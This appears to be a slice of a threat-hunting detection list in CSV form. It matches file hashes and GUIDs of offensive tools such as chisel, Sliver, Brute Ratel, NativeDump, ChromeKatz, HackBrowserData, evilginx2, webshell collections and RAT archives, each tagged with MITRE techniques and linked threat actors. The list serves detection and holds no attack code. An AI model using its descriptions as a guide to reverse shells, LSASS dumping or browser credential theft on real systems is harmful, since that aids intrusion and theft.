"*252320367dfa2dd13f2da44521a0311d1591a952e81b7997c33f4ead02cff736*",".{0,1000}252320367dfa2dd13f2da44521a0311d1591a952e81b7997c33f4ead02cff736.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","23395"
"*2532d6935c32487a273e2f360f73df80c2a9f57620c865d8cc10b9ccf7a9d629*",".{0,1000}2532d6935c32487a273e2f360f73df80c2a9f57620c865d8cc10b9ccf7a9d629.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23398"
"*253e716a-ab96-4f87-88c7-052231ec2a12*",".{0,1000}253e716a\-ab96\-4f87\-88c7\-052231ec2a12.{0,1000}","offensive_tool_keyword","DCSyncer","Perform DCSync operation","T1003.006","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/notsoshant/DCSyncer","1","0","#GUIDproject","N/A","10","2","143","22","2024-11-05T20:03:27Z","2020-06-06T17:20:22Z","23402"
"*2542be74ac14867b90e932f20690900db2c7671d40bac87af91ce7abe341ce54*",".{0,1000}2542be74ac14867b90e932f20690900db2c7671d40bac87af91ce7abe341ce54.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23403"
"*25434c766654b893ce3271e2e05e256ca7a165286db3388f7f64f819d70b95ad*",".{0,1000}25434c766654b893ce3271e2e05e256ca7a165286db3388f7f64f819d70b95ad.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23405"
"*254389e27339fd66920dd72f3ad07fe2e220f6b0cbea8032cf0b1d8285a7b098*",".{0,1000}254389e27339fd66920dd72f3ad07fe2e220f6b0cbea8032cf0b1d8285a7b098.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","#filehash","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","23406"
"*2545de06f2ac30aa79cbeedc5f952c2884506e2d82e0f70c640331d9a07da522*",".{0,1000}2545de06f2ac30aa79cbeedc5f952c2884506e2d82e0f70c640331d9a07da522.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","23407"
"*25472451c57629aa2b0134cb123861d3b115a60fc0a7fbe320d9aa175afa887d*",".{0,1000}25472451c57629aa2b0134cb123861d3b115a60fc0a7fbe320d9aa175afa887d.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","23408"
"*254cf55fb776afbcf5ff93f9647303be1f8bee48bcb78f138881e4dc17c34b81*",".{0,1000}254cf55fb776afbcf5ff93f9647303be1f8bee48bcb78f138881e4dc17c34b81.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23411"
"*25522ee1d92c2a6fb9d9dfa01c00ed08b9430cc573c9c4e4a829a1f0cb1670d7*",".{0,1000}25522ee1d92c2a6fb9d9dfa01c00ed08b9430cc573c9c4e4a829a1f0cb1670d7.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","0","#filehash","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","23413"
"*2553a72abc7f19fbd345e3e85fd73aa883d062e893ed4f7b47ffd7648c16a063*",".{0,1000}2553a72abc7f19fbd345e3e85fd73aa883d062e893ed4f7b47ffd7648c16a063.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23414"
"*2555b58b1d822f73a540ad15f6d6b8a7105f66a7c00233bdd1c03c4b8cc85824*",".{0,1000}2555b58b1d822f73a540ad15f6d6b8a7105f66a7c00233bdd1c03c4b8cc85824.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#filehash","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","23415"
"*25564409a011c563e9623b376593512115515704a5ed932dd18c20a040c8640c*",".{0,1000}25564409a011c563e9623b376593512115515704a5ed932dd18c20a040c8640c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23416"
"*2557d33f3a8599158820c409813b53a521cb3d0993352cd45b75f80eecd33f07*",".{0,1000}2557d33f3a8599158820c409813b53a521cb3d0993352cd45b75f80eecd33f07.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","23417"
"*2562c158d4f10ab67c20710da74463876e093473b56e7e1900a163133c1765b5*",".{0,1000}2562c158d4f10ab67c20710da74463876e093473b56e7e1900a163133c1765b5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23418"
"*2565fc215dd2846177ef9395dfd628b8a99447b4ab83b31eb2c67ca881c3084d*",".{0,1000}2565fc215dd2846177ef9395dfd628b8a99447b4ab83b31eb2c67ca881c3084d.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","23419"
"*2566C66F43F181F2B8AEFE41D902F02B54AE284B516062270E83F301A32A5F35*",".{0,1000}2566C66F43F181F2B8AEFE41D902F02B54AE284B516062270E83F301A32A5F35.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","23420"
"*256b5d779bd052ffe4b332efca0a009614cd4fa935aef4c5e54e9ddb391b0d04*",".{0,1000}256b5d779bd052ffe4b332efca0a009614cd4fa935aef4c5e54e9ddb391b0d04.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23422"
"*256f36a488c65848339cf910cdd4224dfc5a95b504e80ac46e003a7c8cd186f6*",".{0,1000}256f36a488c65848339cf910cdd4224dfc5a95b504e80ac46e003a7c8cd186f6.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","23423"
"*25753582733a48c95a3f179afe3d54e65fcec6a7283a94fcd33f18808ddef166*",".{0,1000}25753582733a48c95a3f179afe3d54e65fcec6a7283a94fcd33f18808ddef166.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23425"
"*257669b9f912f7e9176cc50844b641c13f37428237cdd4336e497e148158d5ff*",".{0,1000}257669b9f912f7e9176cc50844b641c13f37428237cdd4336e497e148158d5ff.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","23426"
"*257cfcdd6311f8c05091d2215e6d0be3bc628f2f34b69668aed74a331fc099c5*",".{0,1000}257cfcdd6311f8c05091d2215e6d0be3bc628f2f34b69668aed74a331fc099c5.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23428"
"*25810493e3a4bd9076cdcdd14f7c7a6e6c159098ab393dd10375690a37bd0125*",".{0,1000}25810493e3a4bd9076cdcdd14f7c7a6e6c159098ab393dd10375690a37bd0125.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23429"
"*25861c1cc31e530c5f8162e78585f40697c28164fd3c561d3d1a31442ee1ec17*",".{0,1000}25861c1cc31e530c5f8162e78585f40697c28164fd3c561d3d1a31442ee1ec17.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23430"
"*25879dae8a91b9cb647c49ace109e948db08e6198565f167233a45fb14bfe5bb*",".{0,1000}25879dae8a91b9cb647c49ace109e948db08e6198565f167233a45fb14bfe5bb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23431"
"*2589213f0c51583dcbaacbe0005e5908*",".{0,1000}2589213f0c51583dcbaacbe0005e5908.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","23432"
"*259322fe4426ae2d44fd68942705f889a5f292aecdb164d4b92302c0eedd3f28*",".{0,1000}259322fe4426ae2d44fd68942705f889a5f292aecdb164d4b92302c0eedd3f28.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","23434"
"*259c9c57a74382b07c0a630b3094489b3aca263504b4fda79d3c20027e2a74fa*",".{0,1000}259c9c57a74382b07c0a630b3094489b3aca263504b4fda79d3c20027e2a74fa.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23435"
"*25a03e663d0f5d7212ecc343b491f4985a3592126df446f42fc09c445dc163dd*",".{0,1000}25a03e663d0f5d7212ecc343b491f4985a3592126df446f42fc09c445dc163dd.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","23436"
"*25a3a725cec379cb70766bcc8ba6a87dba12de35f73c5e0439e2673e6840dc9a*",".{0,1000}25a3a725cec379cb70766bcc8ba6a87dba12de35f73c5e0439e2673e6840dc9a.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","23437"
"*25a808d1b6cfd5fd3bc896730284b0329a78e1b9c889473ccd4be1eef873512c*",".{0,1000}25a808d1b6cfd5fd3bc896730284b0329a78e1b9c889473ccd4be1eef873512c.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23438"
"*25aac4494a46799c4755d9bda39314d628134ee58dd6f724ee905373c3600343*",".{0,1000}25aac4494a46799c4755d9bda39314d628134ee58dd6f724ee905373c3600343.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","#filehash","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","23439"
"*25c0d247d2a85d8372a542255d8ef45a41f6b43633b0a6869b62cab393490d81*",".{0,1000}25c0d247d2a85d8372a542255d8ef45a41f6b43633b0a6869b62cab393490d81.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23442"
"*25cf89a0105c08084f05df75a9dcd1c239e3ec07cf5b36413c04d204393b3560*",".{0,1000}25cf89a0105c08084f05df75a9dcd1c239e3ec07cf5b36413c04d204393b3560.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","23444"
"*25cfd3b1b9d859a36c478b14a65d8aff77ab6c7c68aefe80e9945aef62a14029*",".{0,1000}25cfd3b1b9d859a36c478b14a65d8aff77ab6c7c68aefe80e9945aef62a14029.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23445"
"*25d4635f8b5fea969f8c93a459f6fd0b0e333150254df3fc8963a7d19dd9a754*",".{0,1000}25d4635f8b5fea969f8c93a459f6fd0b0e333150254df3fc8963a7d19dd9a754.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23446"
"*25d74d144c6c9bfd48b8746e20868ac4d699d4514baa136e53ee5f60ed02b962*",".{0,1000}25d74d144c6c9bfd48b8746e20868ac4d699d4514baa136e53ee5f60ed02b962.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23447"
"*25d89bd7da43e326b9bfadeae2c256cf1f06c8522b475d43baecf309b2fa6da7*",".{0,1000}25d89bd7da43e326b9bfadeae2c256cf1f06c8522b475d43baecf309b2fa6da7.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","23448"
"*25dd4db0e48fdc0552e9be4c65e9ae2af7c25e0e63ce4dc08f3f6083d7d971bf*",".{0,1000}25dd4db0e48fdc0552e9be4c65e9ae2af7c25e0e63ce4dc08f3f6083d7d971bf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23450"
"*25e71c952a1ac4aa6614d87ca964afffa3ea33a59ef779e66afe0748eccf1642*",".{0,1000}25e71c952a1ac4aa6614d87ca964afffa3ea33a59ef779e66afe0748eccf1642.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","23453"
"*25ec3ba7a4464210dd357b8454807c4163e761a46ccaa4bdd0b6c77e6b065fa5*",".{0,1000}25ec3ba7a4464210dd357b8454807c4163e761a46ccaa4bdd0b6c77e6b065fa5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23455"
"*26048dbf252141d3db4df311c6d70188c91bf1e4d3bb8cd8870b373566562a1d*",".{0,1000}26048dbf252141d3db4df311c6d70188c91bf1e4d3bb8cd8870b373566562a1d.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","0","#filehash","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","23457"
"*26085f4768e13063e5dde27f0e313854ce91aa032a7b26d4f57ebc03a6628560*",".{0,1000}26085f4768e13063e5dde27f0e313854ce91aa032a7b26d4f57ebc03a6628560.{0,1000}","offensive_tool_keyword","KExecDD","Admin to Kernel code execution using the KSecDD driver","T1068 - T1055.011","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/floesen/KExecDD","1","0","#filehash","N/A","8","3","244","41","2024-04-19T09:58:14Z","2024-04-19T08:54:49Z","23459"
"*2609239cc8bc517f684285133622e8b11192fb456e2dc2937aa2c6c2379a9d38*",".{0,1000}2609239cc8bc517f684285133622e8b11192fb456e2dc2937aa2c6c2379a9d38.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","23460"
"*2611455f4d60bc80f43cb13f480c6bee70497fffea48ed5c0b7d67e7fce33a52*",".{0,1000}2611455f4d60bc80f43cb13f480c6bee70497fffea48ed5c0b7d67e7fce33a52.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#filehash","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","23462"
"*261a0287a47dd71f44a4494a5d563bd5aa673687f60744ecf559ecb817a7ac82*",".{0,1000}261a0287a47dd71f44a4494a5d563bd5aa673687f60744ecf559ecb817a7ac82.{0,1000}","offensive_tool_keyword","PowerUpSQL","NetSPI powershell modules to gather credentials","T1552.001 - T1555.004 - T1003","TA0006 - TA0009 - TA0010","N/A","Black Basta - Dispossessor","Credential Access","https://github.com/NetSPI/Powershell-Modules","1","0","#filehash","N/A","10","2","168","101","2019-06-06T15:54:47Z","2014-02-28T21:24:21Z","23464"
